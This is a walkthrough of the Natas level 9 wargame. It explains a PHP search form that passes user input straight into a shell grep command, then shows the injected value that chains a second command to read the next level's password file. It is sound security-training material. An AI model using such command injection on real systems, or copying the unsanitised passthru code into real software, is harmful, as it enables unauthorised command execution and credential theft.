Challenge:
Seeing the webpage we have an input field to search word containing a specific string. Where we input the string.

Solving it:
So lets see the source code again:

<html>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

Reading this code we can see that the name of the field in the form is ‘needle’. The php code uses a variable which has a value of nothing. If the value is not equal to nothing it executes an php function called passthru which greps through a textfile. Grep is a linux command so the function passthru probably executes a command on the server. Lets read more about this function. Passthru: Execute an external program and display raw output.

So lets see if we can inject anything into the field. But it has to be on the spot where the value of $key is. I haven’t really done this before so lets open a terminal (in linux) and see what we can do if we replace the $key with something valid. I was struggling with grep errors so lets try to inject something so it uses the grep -i function (since i have no idea how to ignore it). Lets use it how they used it in their code and then paste our own command with the && function so it executes a second command. Then use && after it so it doesn’t recognise the last part “dictionary.txt” as an argument for our command.

The original command: grep -i $key dictionary.txt
Injection point: $key
Injection: needle dictionary.txt && cat /etc/natas_webpass/natas10 &&
Full command: grep -i needle dictionary.txt && cat /etc/natas_webpass/natas10 && dictionary.txt

After filling in “needle dictionary.txt && cat /etc/natas_webpass/natas10 &&” we got the password for natas10.

Leave a Reply

Your email address will not be published. Required fields are marked *